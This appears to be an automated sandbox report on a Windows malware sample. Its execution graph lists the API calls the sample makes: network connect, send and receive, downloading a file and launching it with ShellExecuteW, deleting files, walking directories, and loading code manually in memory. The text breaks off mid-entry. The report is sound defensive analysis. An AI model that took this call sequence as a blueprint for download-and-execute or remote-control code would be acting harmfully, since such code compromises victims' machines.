                                                          • Instruction ID: 30db9a821feed76eb9402350712d1b6ebdd31903b31f89f266e277a7c05f99eb
                                                          • Opcode Fuzzy Hash: 45104eba8082290ca96fb4c0bb00ab4307bdd84c4d3f859b64e332720b51dee5
                                                          • Instruction Fuzzy Hash: 6521C5317043046BCB289A6C8864B7ABE97EBC4711F64C029E64DDB784DEB1DC42C751

                                                          Execution Graph

                                                          Execution Coverage:6.6%
                                                          Dynamic/Decrypted Code Coverage:14.4%
                                                          Signature Coverage:7.5%
                                                          Total number of Nodes:2000
                                                          Total number of Limit Nodes:96
                                                          execution_graph 53053 10006d60 53054 10006d69 53053->53054 53055 10006d72 53053->53055 53057 10006c5f 53054->53057 53077 10005af6 GetLastError 53057->53077 53059 10006c6c 53097 10006d7e 53059->53097 53061 10006c74 53106 100069f3 53061->53106 53064 10006c8b 53064->53055 53067 10006cce 53131 1000571e 19 API calls __dosmaperr 53067->53131 53071 10006cc9 53130 10006368 19 API calls __dosmaperr 53071->53130 53073 10006d12 53073->53067 53133 100068c9 25 API calls 53073->53133 53074 10006ce6 53074->53073 53132 1000571e 19 API calls __dosmaperr 53074->53132 53078 10005b12 53077->53078 53079 10005b0c 53077->53079 53083 10005b61 SetLastError 53078->53083 53135 1000637b 19 API calls __dosmaperr 53078->53135 53134 10005e08 10 API calls 2 library calls 53079->53134 53082 10005b24 53087 10005b2c 53082->53087 53137 10005e5e 10 API calls 2 library calls 53082->53137 53083->53059 53085 10005b41 53085->53087 53088 10005b48 53085->53088 53136 1000571e 19 API calls __dosmaperr 53087->53136 53138 1000593c 19 API calls __dosmaperr 53088->53138 53089 10005b32 53091 10005b6d SetLastError 53089->53091 53140 100055a8 36 API calls _abort 53091->53140 53092 10005b53 53139 1000571e 19 API calls __dosmaperr 53092->53139 53096 10005b5a 53096->53083 53096->53091 53098 10006d8a ___DestructExceptionObject 53097->53098 53099 10005af6 _abort 36 API calls 53098->53099 53104 10006d94 53099->53104 53101 10006e18 _abort 53101->53061 53104->53101 53141 100055a8 36 API calls _abort 53104->53141 53142 10005671 RtlEnterCriticalSection 53104->53142 53143 1000571e 19 API calls __dosmaperr 53104->53143 53144 10006e0f RtlLeaveCriticalSection _abort 53104->53144 53145 100054a7 53106->53145 53109 10006a14 GetOEMCP 53112 10006a3d 53109->53112 53110 10006a26 53111 10006a2b GetACP 53110->53111 53110->53112 53111->53112 53112->53064 53113 100056d0 53112->53113 53114 1000570e 53113->53114 53118 100056de __dosmaperr 53113->53118 53156 10006368 19 API calls __dosmaperr 53114->53156 53115 100056f9 RtlAllocateHeap 53117 1000570c 53115->53117 53115->53118 53117->53067 53120 10006e20 53117->53120 53118->53114 53118->53115 53155 1000474f 7 API calls 2 library calls 53118->53155 53121 100069f3 38 API calls 53120->53121 53122 10006e3f 53121->53122 53125 10006e90 IsValidCodePage 53122->53125 53127 10006e46 53122->53127 53129 10006eb5 ___scrt_fastfail 53122->53129 53124 10006cc1 53124->53071 53124->53074 53126 10006ea2 GetCPInfo 53125->53126 53125->53127 53126->53127 53126->53129 53167 10002ada 53127->53167 53157 10006acb GetCPInfo 53129->53157 53130->53067 53131->53064 53132->53073 53133->53067 53134->53078 53135->53082 53136->53089 53137->53085 53138->53092 53139->53096 53142->53104 53143->53104 53144->53104 53146 100054c4 53145->53146 53147 100054ba 53145->53147 53146->53147 53148 10005af6 _abort 36 API calls 53146->53148 53147->53109 53147->53110 53149 100054e5 53148->53149 53153 10007a00 36 API calls __fassign 53149->53153 53151 100054fe 53154 10007a2d 36 API calls __fassign 53151->53154 53153->53151 53154->53147 53155->53118 53156->53117 53158 10006baf 53157->53158 53163 10006b05 53157->53163 53160 10002ada _ValidateLocalCookies 5 API calls 53158->53160 53162 10006c5b 53160->53162 53162->53127 53174 100086e4 53163->53174 53166 10008a3e 41 API calls 53166->53158 53168 10002ae3 53167->53168 53169 10002ae5 IsProcessorFeaturePresent 53167->53169 53168->53124 53171 10002b58 53169->53171 53244 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53171->53244 53173 10002c3b 53173->53124 53175 100054a7 __fassign 36 API calls 53174->53175 53176 10008704 MultiByteToWideChar 53175->53176 53178 10008742 53176->53178 53184 100087da 53176->53184 53180 100056d0 20 API calls 53178->53180 53185 10008763 ___scrt_fastfail 53178->53185 53179 10002ada _ValidateLocalCookies 5 API calls 53181 10006b66 53179->53181 53180->53185 53188 10008a3e 53181->53188 53182 100087d4 53193 10008801 19 API calls _free 53182->53193 53184->53179 53185->53182 53186 100087a8 MultiByteToWideChar 53185->53186 53186->53182 53187 100087c4 GetStringTypeW 53186->53187 53187->53182 53189 100054a7 __fassign 36 API calls 53188->53189 53190 10008a51 53189->53190 53194 10008821 53190->53194 53193->53184 53195 1000883c 53194->53195 53196 10008862 MultiByteToWideChar 53195->53196 53197 10008a16 53196->53197 53198 1000888c 53196->53198 53199 10002ada _ValidateLocalCookies 5 API calls 53197->53199 53201 100056d0 20 API calls 53198->53201 53203 100088ad 53198->53203 53200 10006b87 53199->53200 53200->53166 53201->53203 53202 100088f6 MultiByteToWideChar 53204 1000890f 53202->53204 53216 10008962 53202->53216 53203->53202 53203->53216 53221 10005f19 53204->53221 53208 10008939 53210 10005f19 10 API calls 53208->53210 53208->53216 53209 10008971 53212 100056d0 20 API calls 53209->53212 53217 10008992 53209->53217 53210->53216 53211 10008a07 53229 10008801 19 API calls _free 53211->53229 53212->53217 53213 10005f19 10 API calls 53215 100089e6 53213->53215 53215->53211 53218 100089f5 WideCharToMultiByte 53215->53218 53230 10008801 19 API calls _free 53216->53230 53217->53211 53217->53213 53218->53211 53219 10008a35 53218->53219 53231 10008801 19 API calls _free 53219->53231 53232 10005c45 53221->53232 53223 10005f40 53225 10005f49 53223->53225 53236 10005fa1 9 API calls 2 library calls 53223->53236 53227 10002ada _ValidateLocalCookies 5 API calls 53225->53227 53226 10005f89 LCMapStringW 53226->53225 53228 10005f9b 53227->53228 53228->53208 53228->53209 53228->53216 53229->53216 53230->53197 53231->53216 53233 10005c75 __crt_fast_encode_pointer 53232->53233 53235 10005c71 53232->53235 53233->53223 53235->53233 53237 10005ce1 53235->53237 53236->53226 53238 10005d02 LoadLibraryExW 53237->53238 53242 10005cf7 53237->53242 53239 10005d37 53238->53239 53240 10005d1f GetLastError 53238->53240 53239->53242 53243 10005d4e FreeLibrary 53239->53243 53240->53239 53241 10005d2a LoadLibraryExW 53240->53241 53241->53239 53242->53235 53243->53242 53244->53173 53245 4165a0 53256 401e65 53245->53256 53247 4165b0 53261 4020f6 53247->53261 53250 401e65 22 API calls 53251 4165c6 53250->53251 53252 4020f6 28 API calls 53251->53252 53253 4165d1 53252->53253 53267 41292a 53253->53267 53257 401e6d 53256->53257 53258 401e75 53257->53258 53286 402158 22 API calls 53257->53286 53258->53247 53262 40210c 53261->53262 53287 4023ce 53262->53287 53264 402126 53291 402569 53264->53291 53266 402134 53266->53250 53339 40482d 53267->53339 53269 41293e 53346 4048c8 connect 53269->53346 53273 41295f 53411 402f10 53273->53411 53282 401fd8 11 API calls 53283 412991 53282->53283 53284 401fd8 11 API calls 53283->53284 53285 412999 53284->53285 53288 402428 53287->53288 53289 4023d8 53287->53289 53288->53264 53289->53288 53301 4027a7 53289->53301 53312 402888 53291->53312 53293 40257d 53294 402592 53293->53294 53295 4025a7 53293->53295 53317 402a34 22 API calls 53294->53317 53319 4028e8 53295->53319 53298 40259b 53318 4029da 22 API calls 53298->53318 53300 4025a5 53300->53266 53302 402e21 53301->53302 53305 4016b4 53302->53305 53304 402e30 53304->53288 53306 4016cb 53305->53306 53310 4016c6 53305->53310 53307 4016f3 53306->53307 53306->53310 53307->53304 53309 43bd18 53311 43bd19 11 API calls _Atexit 53310->53311 53311->53309 53313 402890 53312->53313 53314 402898 53313->53314 53330 402ca3 22 API calls 53313->53330 53314->53293 53317->53298 53318->53300 53320 4028f1 53319->53320 53321 402953 53320->53321 53323 4028fb 53320->53323 53337 4028a4 22 API calls 53321->53337 53325 402904 53323->53325 53327 402917 53323->53327 53331 402cae 53325->53331 53328 402915 53327->53328 53329 4023ce 11 API calls 53327->53329 53328->53300 53329->53328 53332 402cb8 __EH_prolog 53331->53332 53338 402e54 22 API calls 53332->53338 53334 4023ce 11 API calls 53336 402d92 53334->53336 53335 402d24 53335->53334 53336->53328 53338->53335 53340 404846 socket 53339->53340 53341 404839 53339->53341 53343 404860 CreateEventW 53340->53343 53344 404842 53340->53344 53452 40489e WSAStartup 53341->53452 53343->53269 53344->53269 53345 40483e 53345->53340 53345->53344 53347 404a1b 53346->53347 53348 4048ee 53346->53348 53349 404a21 WSAGetLastError 53347->53349 53399 40497e 53347->53399 53350 404923 53348->53350 53348->53399 53453 40531e 53348->53453 53351 404a31 53349->53351 53349->53399 53488 420c60 27 API calls 53350->53488 53354 404932 53351->53354 53355 404a36 53351->53355 53361 402093 28 API calls 53354->53361 53493 41cae1 53355->53493 53356 40492b 53356->53354 53360 404941 53356->53360 53357 40490f 53458 402093 53357->53458 53370 404950 53360->53370 53371 404987 53360->53371 53364 404a80 53361->53364 53368 402093 28 API calls 53364->53368 53372 404a8f 53368->53372 53375 402093 28 API calls 53370->53375 53490 421a40 54 API calls 53371->53490 53376 41b4ef 80 API calls 53372->53376 53379 40495f 53375->53379 53376->53399 53378 40498f 53381 4049c4 53378->53381 53382 404994 53378->53382 53383 402093 28 API calls 53379->53383 53492 420e06 28 API calls 53381->53492 53386 402093 28 API calls 53382->53386 53387 40496e 53383->53387 53389 4049a3 53386->53389 53390 41b4ef 80 API calls 53387->53390 53388 4049cc 53391 4049f9 CreateEventW CreateEventW 53388->53391 53394 402093 28 API calls 53388->53394 53392 402093 28 API calls 53389->53392 53393 404973 53390->53393 53391->53399 53395 4049b2 53392->53395 53489 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53393->53489 53397 4049e2 53394->53397 53398 41b4ef 80 API calls 53395->53398 53400 402093 28 API calls 53397->53400 53401 4049b7 53398->53401 53406 402f31 53399->53406 53402 4049f1 53400->53402 53491 4210b2 52 API calls 53401->53491 53404 41b4ef 80 API calls 53402->53404 53405 4049f6 53404->53405 53405->53391 53407 4020df 11 API calls 53406->53407 53408 402f3d 53407->53408 53409 4032a0 28 API calls 53408->53409 53410 402f59 53409->53410 53410->53273 53566 401fb0 53411->53566 53413 402f1e 53414 402055 11 API calls 53413->53414 53415 402f2d 53414->53415 53416 404aa1 53415->53416 53417 404ab4 53416->53417 53569 40520c 53417->53569 53419 404ac9 ctype 53420 404b40 WaitForSingleObject 53419->53420 53421 404b20 53419->53421 53423 404b56 53420->53423 53422 404b32 send 53421->53422 53424 404b7b 53422->53424 53575 42103a 54 API calls 53423->53575 53427 401fd8 11 API calls 53424->53427 53426 404b69 SetEvent 53426->53424 53428 404b83 53427->53428 53429 401fd8 11 API calls 53428->53429 53430 404b8b 53429->53430 53431 401fd8 53430->53431 53432 4023ce 11 API calls 53431->53432 53433 401fe1 53432->53433 53434 404c10 53433->53434 53435 4020df 11 API calls 53434->53435 53436 404c27 53435->53436 53437 4020df 11 API calls 53436->53437 53440 404c30 53437->53440 53442 404ca1 53440->53442 53446 401fd8 11 API calls 53440->53446 53593 43bd51 53440->53593 53600 404b96 53440->53600 53606 4020b7 53440->53606 53612 401fe2 53440->53612 53621 404cc3 53440->53621 53635 404e26 WaitForSingleObject 53442->53635 53446->53440 53447 401fd8 11 API calls 53448 404cb1 53447->53448 53449 401fd8 11 API calls 53448->53449 53450 404cba 53449->53450 53450->53282 53452->53345 53505 4020df 53453->53505 53455 40532a 53509 4032a0 53455->53509 53457 405346 53457->53357 53459 40209b 53458->53459 53460 4023ce 11 API calls 53459->53460 53461 4020a6 53460->53461 53513 4024ed 53461->53513 53464 41b4ef 53465 41b5a0 53464->53465 53466 41b505 GetLocalTime 53464->53466 53468 401fd8 11 API calls 53465->53468 53467 40531e 28 API calls 53466->53467 53469 41b547 53467->53469 53470 41b5a8 53468->53470 53524 406383 53469->53524 53472 401fd8 11 API calls 53470->53472 53474 41b5b0 53472->53474 53474->53350 53475 402f10 28 API calls 53476 41b55f 53475->53476 53477 406383 28 API calls 53476->53477 53478 41b56b 53477->53478 53529 407200 77 API calls 53478->53529 53480 41b579 53481 401fd8 11 API calls 53480->53481 53482 41b585 53481->53482 53483 401fd8 11 API calls 53482->53483 53484 41b58e 53483->53484 53485 401fd8 11 API calls 53484->53485 53486 41b597 53485->53486 53487 401fd8 11 API calls 53486->53487 53487->53465 53488->53356 53489->53399 53490->53378 53491->53393 53492->53388 53494 4020df 11 API calls 53493->53494 53495 41caf5 FormatMessageA 53494->53495 53496 41cb21 53495->53496 53497 41cb13 53495->53497 53500 41cb2c LocalFree 53496->53500 53498 402093 28 API calls 53497->53498 53499 41cb1f 53498->53499 53502 401fd8 11 API calls 53499->53502 53501 402055 11 API calls 53500->53501 53501->53499 53503 404a40 53502->53503 53504 4052fd 28 API calls 53503->53504 53506 4020e7 53505->53506 53507 4023ce 11 API calls 53506->53507 53508 4020f2 53507->53508 53508->53455 53511 4032aa 53509->53511 53510 4032c9 53510->53457 53511->53510 53512 4028e8 28 API calls 53511->53512 53512->53510 53514 4024f9 53513->53514 53517 40250a 53514->53517 53516 4020b1 53516->53464 53518 40251a 53517->53518 53519 402520 53518->53519 53520 402535 53518->53520 53522 402569 28 API calls 53519->53522 53521 4028e8 28 API calls 53520->53521 53523 402533 53521->53523 53522->53523 53523->53516 53530 4051ef 53524->53530 53526 406391 53534 402055 53526->53534 53529->53480 53531 4051fb 53530->53531 53540 405274 53531->53540 53533 405208 53533->53526 53535 402061 53534->53535 53536 4023ce 11 API calls 53535->53536 53537 40207b 53536->53537 53562 40267a 53537->53562 53541 405282 53540->53541 53542 405288 53541->53542 53543 40529e 53541->53543 53551 4025f0 53542->53551 53544 4052f5 53543->53544 53545 4052b6 53543->53545 53560 4028a4 22 API calls 53544->53560 53549 4028e8 28 API calls 53545->53549 53550 40529c 53545->53550 53549->53550 53550->53533 53552 402888 22 API calls 53551->53552 53553 402602 53552->53553 53554 402672 53553->53554 53555 402629 53553->53555 53561 4028a4 22 API calls 53554->53561 53558 4028e8 28 API calls 53555->53558 53559 40263b 53555->53559 53558->53559 53559->53550 53563 40268b 53562->53563 53564 4023ce 11 API calls 53563->53564 53565 40208d 53564->53565 53565->53475 53567 4025f0 28 API calls 53566->53567 53568 401fbd 53567->53568 53568->53413 53570 405214 53569->53570 53571 4023ce 11 API calls 53570->53571 53572 40521f 53571->53572 53576 405234 53572->53576 53574 40522e 53574->53419 53575->53426 53577 405240 53576->53577 53578 40526e 53576->53578 53579 4028e8 28 API calls 53577->53579 53592 4028a4 22 API calls 53578->53592 53582 40524a 53579->53582 53582->53574 53599 446137 ___crtLCMapStringA 53593->53599 53594 446175 53649 4405dd 20 API calls __dosmaperr 53594->53649 53596 446160 RtlAllocateHeap 53597 446173 53596->53597 53596->53599 53597->53440 53599->53594 53599->53596 53648 442f80 7 API calls 2 library calls 53599->53648 53601 404ba0 WaitForSingleObject 53600->53601 53602 404bcd recv 53600->53602 53650 421076 54 API calls 53601->53650 53604 404be0 53602->53604 53604->53440 53605 404bbc SetEvent 53605->53604 53607 4020bf 53606->53607 53608 4023ce 11 API calls 53607->53608 53609 4020ca 53608->53609 53610 40250a 28 API calls 53609->53610 53611 4020d9 53610->53611 53611->53440 53613 401ff1 53612->53613 53620 402039 53612->53620 53614 4023ce 11 API calls 53613->53614 53615 401ffa 53614->53615 53616 40203c 53615->53616 53617 402015 53615->53617 53618 40267a 11 API calls 53616->53618 53651 403098 28 API calls 53617->53651 53618->53620 53620->53440 53622 4020df 11 API calls 53621->53622 53632 404cde 53622->53632 53623 404e13 53624 401fd8 11 API calls 53623->53624 53625 404e1c 53624->53625 53625->53440 53626 4041a2 28 API calls 53626->53632 53627 401fe2 28 API calls 53627->53632 53628 401fd8 11 API calls 53628->53632 53629 4020f6 28 API calls 53629->53632 53632->53623 53632->53626 53632->53627 53632->53628 53632->53629 53652 41299f 53632->53652 53696 406eb0 53632->53696 53767 401fc0 53632->53767 53636 404e40 SetEvent CloseHandle 53635->53636 53637 404e57 closesocket 53635->53637 53638 404ca8 53636->53638 53639 404e64 53637->53639 53638->53447 53640 404e7a 53639->53640 54530 4050e4 84 API calls 53639->54530 53642 404e8c WaitForSingleObject 53640->53642 53643 404ece SetEvent CloseHandle 53640->53643 54531 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53642->54531 53643->53638 53645 404e9b SetEvent WaitForSingleObject 54532 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53645->54532 53647 404eb3 SetEvent CloseHandle CloseHandle 53647->53643 53648->53599 53649->53597 53650->53605 53651->53620 53653 4129b1 53652->53653 53771 4041a2 53653->53771 53656 4020f6 28 API calls 53657 4129d3 53656->53657 53658 4020f6 28 API calls 53657->53658 53659 4129e2 53658->53659 53774 41be1b 53659->53774 53661 412a93 53943 401e8d 53661->53943 53663 401e65 22 API calls 53665 412a02 53663->53665 53668 4020f6 28 API calls 53665->53668 53667 401fd8 11 API calls 53669 412aa5 53667->53669 53670 412a0d 53668->53670 53671 401fd8 11 API calls 53669->53671 53672 401e65 22 API calls 53670->53672 53673 412aad 53671->53673 53674 412a18 53672->53674 53673->53632 53675 4020f6 28 API calls 53674->53675 53676 412a23 53675->53676 53677 401e65 22 API calls 53676->53677 53678 412a2e 53677->53678 53679 4020f6 28 API calls 53678->53679 53680 412a39 53679->53680 53681 401e65 22 API calls 53680->53681 53682 412a44 53681->53682 53683 4020f6 28 API calls 53682->53683 53684 412a4f 53683->53684 53685 401e65 22 API calls 53684->53685 53686 412a5a 53685->53686 53687 4020f6 28 API calls 53686->53687 53688 412a65 53687->53688 53689 401e65 22 API calls 53688->53689 53690 412a73 53689->53690 53691 4020f6 28 API calls 53690->53691 53692 412a7e 53691->53692 53796 412ab4 GetModuleFileNameW 53692->53796 53697 406ec4 53696->53697 53698 4041a2 28 API calls 53697->53698 53699 406ed9 53698->53699 53700 4020f6 28 API calls 53699->53700 53701 406ee8 53700->53701 53702 4020f6 28 API calls 53701->53702 53703 406ef7 53702->53703 53704 41be1b 28 API calls 53703->53704 53705 406f00 53704->53705 53706 406f0b 53705->53706 53707 40702e 53705->53707 53711 401e65 22 API calls 53706->53711 53765 4070e6 53706->53765 53708 401e65 22 API calls 53707->53708 53710 40703a 53708->53710 53709 401e8d 11 API calls 53712 407176 53709->53712 53716 407052 53710->53716 53717 4070eb 53710->53717 53713 406f20 53711->53713 53714 401fd8 11 API calls 53712->53714 53719 406f38 53713->53719 53720 406fda 53713->53720 53715 40717f 53714->53715 53721 401fd8 11 API calls 53715->53721 53718 401e65 22 API calls 53716->53718 53722 401e65 22 API calls 53717->53722 53723 407059 53718->53723 53724 401e65 22 API calls 53719->53724 53726 401e65 22 API calls 53720->53726 53725 407187 53721->53725 53729 4070f1 53722->53729 53728 401e65 22 API calls 53723->53728 53727 406f3f 53724->53727 53725->53632 53731 406fe0 53726->53731 53733 401e65 22 API calls 53727->53733 53732 40706d 53728->53732 53730 401e65 22 API calls 53729->53730 53729->53765 53734 407114 53730->53734 53735 401e65 22 API calls 53731->53735 53731->53765 53736 40da34 32 API calls 53732->53736 53737 406f53 53733->53737 54262 41b9f6 22 API calls 2 library calls 53734->54262 53739 406ffe 53735->53739 53740 407080 53736->53740 54200 40da34 53737->54200 54259 418568 53739->54259 53747 401e65 22 API calls 53740->53747 53742 407126 53745 407011 53742->53745 53746 418568 31 API calls 53742->53746 53744 406f66 53750 401e65 22 API calls 53744->53750 53749 402093 28 API calls 53745->53749 53746->53745 53748 407097 53747->53748 53755 40709e URLDownloadToFileW 53748->53755 53752 407160 53749->53752 53751 406f7c 53750->53751 54258 41c4f2 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 53751->54258 53753 404aa1 61 API calls 53752->53753 53753->53765 53756 406f85 53755->53756 53757 406fd0 53755->53757 53756->53757 53758 401e65 22 API calls 53756->53758 53759 402093 28 API calls 53757->53759 53763 406f98 53758->53763 53760 4070d0 53759->53760 53761 404aa1 61 API calls 53760->53761 53762 4070dd 53761->53762 53764 401f09 11 API calls 53762->53764 53763->53757 53766 406fb5 ShellExecuteW 53763->53766 53764->53765 53765->53709 53766->53757 53768 401fd2 CreateEventA CreateThread WaitForSingleObject CloseHandle 53767->53768 53769 401fc9 53767->53769 53768->53632 54344 415aea 53768->54344 54343 4025e0 28 API calls 53769->54343 53949 40423a 53771->53949 53775 4020df 11 API calls 53774->53775 53789 41be2e 53775->53789 53776 401fd8 11 API calls 53777 41bed0 53776->53777 53779 401fd8 11 API calls 53777->53779 53778 41bea0 53780 4041a2 28 API calls 53778->53780 53782 41bed8 53779->53782 53783 41beac 53780->53783 53781 4041a2 28 API calls 53781->53789 53784 401fd8 11 API calls 53782->53784 53786 401fe2 28 API calls 53783->53786 53785 4129eb 53784->53785 53785->53661 53785->53663 53788 41beb5 53786->53788 53787 401fe2 28 API calls 53787->53789 53790 401fd8 11 API calls 53788->53790 53789->53778 53789->53781 53789->53787 53791 401fd8 11 API calls 53789->53791 53795 41be9e 53789->53795 53955 41ce34 53789->53955 53792 41bebd 53790->53792 53791->53789 53793 41ce34 28 API calls 53792->53793 53793->53795 53795->53776 53797 4020df 11 API calls 53796->53797 53798 412adf 53797->53798 53799 4020df 11 API calls 53798->53799 53800 412aeb 53799->53800 53801 4020df 11 API calls 53800->53801 53823 412af7 53801->53823 53802 41b978 43 API calls 53802->53823 53803 40d9e8 32 API calls 53803->53823 53804 401fd8 11 API calls 53804->53823 53805 40417e 28 API calls 53805->53823 53806 4042fc 84 API calls 53806->53823 53807 40431d 28 API calls 53807->53823 53808 412c1d Sleep 53808->53823 53809 403014 28 API calls 53809->53823 53810 418568 31 API calls 53810->53823 53811 412cbf Sleep 53811->53823 53812 401f09 11 API calls 53812->53823 53813 412d61 Sleep 53813->53823 53814 412dc4 DeleteFileW 53814->53823 53815 41c485 32 API calls 53815->53823 53816 412dfb DeleteFileW 53816->53823 53817 412e4d Sleep 53817->53823 53818 412e37 DeleteFileW 53818->53823 53819 412ec6 53820 401f09 11 API calls 53819->53820 53821 412ed2 53820->53821 53822 401f09 11 API calls 53821->53822 53824 412ede 53822->53824 53823->53802 53823->53803 53823->53804 53823->53805 53823->53806 53823->53807 53823->53808 53823->53809 53823->53810 53823->53811 53823->53812 53823->53813 53823->53814 53823->53815 53823->53816 53823->53817 53823->53819 53827 412e92 Sleep 53823->53827 53830 412e26 53823->53830 53825 401f09 11 API calls 53824->53825 53826 412eea 53825->53826 53980 40b904 53826->53980 53998 401f09 53827->53998 53830->53818 53830->53823 53833 401f09 11 API calls 53830->53833 53836 412ec4 53830->53836 53831 412efd 53832 4020f6 28 API calls 53831->53832 53834 412f1d 53832->53834 53833->53830 53986 41322d 53834->53986 53836->53826 53838 401f09 11 API calls 53839 412f34 53838->53839 53840 412f54 53839->53840 53841 4130a8 53839->53841 54001 41bd1e 53840->54001 53842 41bd1e 28 API calls 53841->53842 53844 4130b1 53842->53844 53846 402f31 28 API calls 53844->53846 53848 4130e8 53846->53848 53850 402f10 28 API calls 53848->53850 53853 4130f7 53850->53853 53854 402f10 28 API calls 53853->53854 53856 413103 53854->53856 53858 402f10 28 API calls 53856->53858 53944 402163 53943->53944 53945 40219f 53944->53945 54198 402730 11 API calls 53944->54198 53945->53667 53947 402184 54199 402712 11 API calls std::_Deallocate 53947->54199 53950 404243 53949->53950 53951 4023ce 11 API calls 53950->53951 53952 40424e 53951->53952 53953 402569 28 API calls 53952->53953 53954 4041b5 53953->53954 53954->53656 53956 41ce41 53955->53956 53957 41cea0 53956->53957 53960 41ce51 53956->53960 53958 41ceba 53957->53958 53971 41cfe0 28 API calls 53957->53971 53961 41d146 28 API calls 53958->53961 53962 41ce89 53960->53962 53966 41cfe0 28 API calls 53960->53966 53963 41ce9c 53961->53963 53967 41d146 53962->53967 53963->53789 53966->53962 53968 41d14f 53967->53968 53972 41d1f2 53968->53972 53971->53958 53973 41d1fb 53972->53973 53976 41d2a0 53973->53976 53978 41d2ab 53976->53978 53977 41d159 53977->53963 53978->53977 53979 4020f6 28 API calls 53978->53979 53979->53977 53981 40b90c 53980->53981 54013 402252 53981->54013 53983 40b917 54017 40b92c 53983->54017 53985 40b926 53985->53831 53987 41323c 53986->53987 53996 41326b 53986->53996 54043 411cf2 53987->54043 53988 41327a 54047 40417e 53988->54047 53993 401fd8 11 API calls 53995 412f28 53993->53995 53995->53838 53996->53988 54039 10001c5b 53996->54039 53999 402252 11 API calls 53998->53999 54000 401f12 53999->54000 54000->53830 54002 41bd2b 54001->54002 54003 4020b7 28 API calls 54002->54003 54004 412f60 54003->54004 54005 41bb8e 54004->54005 54189 441e81 54005->54189 54014 4022ac 54013->54014 54015 40225c 54013->54015 54014->53983 54015->54014 54024 402779 11 API calls std::_Deallocate 54015->54024 54018 40b966 54017->54018 54019 40b938 54017->54019 54036 4028a4 22 API calls 54018->54036 54025 4027e6 54019->54025 54023 40b942 54023->53985 54024->54014 54026 4027ef 54025->54026 54027 402851 54026->54027 54028 4027f9 54026->54028 54038 4028a4 22 API calls 54027->54038 54031 402802 54028->54031 54033 402815 54028->54033 54037 402aea 28 API calls __EH_prolog 54031->54037 54034 402813 54033->54034 54035 402252 11 API calls 54033->54035 54034->54023 54035->54034 54037->54034 54040 10001c6b ___scrt_fastfail 54039->54040 54053 100012ee 54040->54053 54042 10001c87 54042->53988 54095 411cfe 54043->54095 54046 411f67 22 API calls new 54046->53996 54048 404186 54047->54048 54049 402252 11 API calls 54048->54049 54050 404191 54049->54050 54168 4041bc 54050->54168 54054 10001324 ___scrt_fastfail 54053->54054 54055 100013b7 GetEnvironmentVariableW 54054->54055 54079 100010f1 54055->54079 54058 100010f1 51 API calls 54059 10001465 54058->54059 54060 100010f1 51 API calls 54059->54060 54061 10001479 54060->54061 54062 100010f1 51 API calls 54061->54062 54063 1000148d 54062->54063 54064 100010f1 51 API calls 54063->54064 54065 100014a1 54064->54065 54066 100010f1 51 API calls 54065->54066 54067 100014b5 lstrlenW 54066->54067 54068 100014d2 54067->54068 54069 100014d9 lstrlenW 54067->54069 54068->54042 54070 100010f1 51 API calls 54069->54070 54071 10001501 lstrlenW lstrcatW 54070->54071 54072 100010f1 51 API calls 54071->54072 54080 10001118 ___scrt_fastfail 54079->54080 54081 10001129 lstrlenW 54080->54081 54092 10002c40 54081->54092 54084 10001177 lstrlenW FindFirstFileW 54086 100011a0 54084->54086 54087 100011e1 54084->54087 54085 10001168 lstrlenW 54085->54084 54088 100011c7 FindNextFileW 54086->54088 54089 100011aa 54086->54089 54087->54058 54088->54086 54091 100011da FindClose 54088->54091 54089->54088 54094 10001000 51 API calls ___scrt_fastfail 54089->54094 54091->54087 54093 10001148 lstrcatW lstrlenW 54092->54093 54093->54084 54093->54085 54094->54089 54130 41179c 54095->54130 54097 411d32 SetLastError 54126 411cfa 54097->54126 54098 411d1c 54098->54097 54099 41179c SetLastError 54098->54099 54098->54126 54100 411d4f 54099->54100 54100->54097 54102 411d71 GetNativeSystemInfo 54100->54102 54100->54126 54103 411db7 54102->54103 54114 411dc4 SetLastError 54103->54114 54133 411ca3 VirtualAlloc 54103->54133 54106 411de7 54107 411e0c GetProcessHeap HeapAlloc 54106->54107 54159 411ca3 VirtualAlloc 54106->54159 54109 411e23 54107->54109 54110 411e35 54107->54110 54160 411cba VirtualFree 54109->54160 54113 41179c SetLastError 54110->54113 54111 411dff 54111->54107 54111->54114 54115 411e7e 54113->54115 54114->54126 54116 411f30 54115->54116 54134 411ca3 VirtualAlloc 54115->54134 54161 412077 GetProcessHeap HeapFree 54116->54161 54119 411e97 ctype 54135 4117af 54119->54135 54121 411ec3 54121->54116 54139 411b5f 54121->54139 54125 411efb 54125->54116 54125->54126 54126->54046 54131 4117a0 SetLastError 54130->54131 54132 4117ab 54130->54132 54131->54098 54132->54098 54133->54106 54134->54119 54136 411885 54135->54136 54138 4117db ctype ___scrt_get_show_window_mode 54135->54138 54136->54121 54137 41179c SetLastError 54137->54138 54138->54136 54138->54137 54140 411b80 IsBadReadPtr 54139->54140 54146 411c6a 54139->54146 54140->54146 54148 411b9a 54140->54148 54143 411c82 SetLastError 54143->54146 54144 411c6c SetLastError 54144->54146 54145 411c4f IsBadReadPtr 54145->54146 54145->54148 54146->54116 54149 41194f 54146->54149 54148->54143 54148->54144 54148->54145 54148->54146 54162 440f0d 22 API calls 3 library calls 54148->54162 54153 411975 54149->54153 54150 411a5e 54151 4118b2 VirtualProtect 54150->54151 54152 411a70 54151->54152 54152->54125 54153->54150 54153->54152 54163 4118b2 54153->54163 54159->54111 54160->54114 54161->54126 54162->54148 54164 4118c3 54163->54164 54166 4118bb 54163->54166 54164->54166 54166->54153 54169 4041c8 54168->54169 54172 4041d9 54169->54172 54171 40419c 54171->53993 54173 4041e9 54172->54173 54174 404206 54173->54174 54175 4041ef 54173->54175 54176 4027e6 28 API calls 54174->54176 54179 404267 54175->54179 54178 404204 54176->54178 54178->54171 54180 402888 22 API calls 54179->54180 54181 40427b 54180->54181 54182 404290 54181->54182 54183 4042a5 54181->54183 54185 4042df 22 API calls 54182->54185 54184 4027e6 28 API calls 54183->54184 54188 4042a3 54184->54188 54186 404299 54185->54186 54187 402c48 22 API calls 54186->54187 54187->54188 54188->54178 54190 441e8d 54189->54190 54193 441c7d 54190->54193 54198->53947 54199->53945 54263 401f86 54200->54263 54203 40da70 54282 41b5b4 29 API calls 54203->54282 54204 40daa5 54292 41bfb7 54204->54292 54206 40da66 54208 40db99 GetLongPathNameW 54206->54208 54211 40417e 28 API calls 54208->54211 54210 40da79 54283 